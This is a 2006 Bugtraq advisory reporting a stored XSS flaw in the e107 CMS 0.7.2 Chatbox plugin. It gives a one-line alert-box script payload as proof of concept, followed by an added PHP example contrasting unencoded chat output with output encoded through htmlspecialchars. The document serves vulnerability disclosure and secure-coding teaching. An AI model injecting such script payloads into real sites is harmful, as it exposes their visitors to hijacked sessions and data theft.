Bugtraq mailing list archives

e107 CMS 0.7.2 Chatbox plugin XSS vulnerability


From: ssteam.pl () gmail com
Date: Sat, 18 Feb 2006 10:08:35 +0100


Software:         e107 CMS 0.7.2
Software Details: Chatbox Plugin v1.0
Class:            Remote
Type:             XSS


========== Description ===========
An XSS vulnerability exists in e107 0.7.2 CMS.
User input is not correctly sanitized in the Chatbox Plugin v1.0.



========== Exploit =============
Just paste the sample code into the Chatbox:
<script>alert("xss vuln found by ssteam")</script>



Discovered by: marc & shb  (ssteam.pl () gmail com)

Regards,
marc & shb
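
Added example (not part of the original post, and not e107 source code): the PHP below contrasts the unencoded-output pattern that leads to stored XSS in a chat box with an output-encoded version, using the advisory's sample string as input. All function names and the HTML markup are hypothetical.

```php
<?php
// Hypothetical chat box rendering code, written for illustration only.

// Vulnerable pattern: stored user input is concatenated into the page as-is,
// so any markup a poster submitted is interpreted by every viewer's browser.
function render_message_unsafe(string $nick, string $message): string
{
    return '<div class="chat"><b>' . $nick . '</b>: ' . $message . '</div>';
}

// Encode for the HTML context at output time. ENT_QUOTES covers both quote
// styles (needed if the value ever lands in an attribute); ENT_SUBSTITUTE
// replaces invalid UTF-8 sequences instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: every user-controlled field (nickname and message) is
// encoded first; nl2br() runs afterwards so only the <br> tags it adds
// are real markup.
function render_message_safe(string $nick, string $message): string
{
    return '<div class="chat"><b>' . h($nick) . '</b>: '
        . nl2br(h($message)) . '</div>';
}

// Sample input: the string quoted in the advisory.
$sample = '<script>alert("xss vuln found by ssteam")</script>';

// The unsafe output contains a live <script> element; the safe output
// contains only the entity-encoded text of the message.
echo render_message_unsafe('guest', $sample), PHP_EOL;
echo render_message_safe('guest', $sample), PHP_EOL;
```

Encoding at output time protects viewers even when unescaped messages are already stored in the database.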

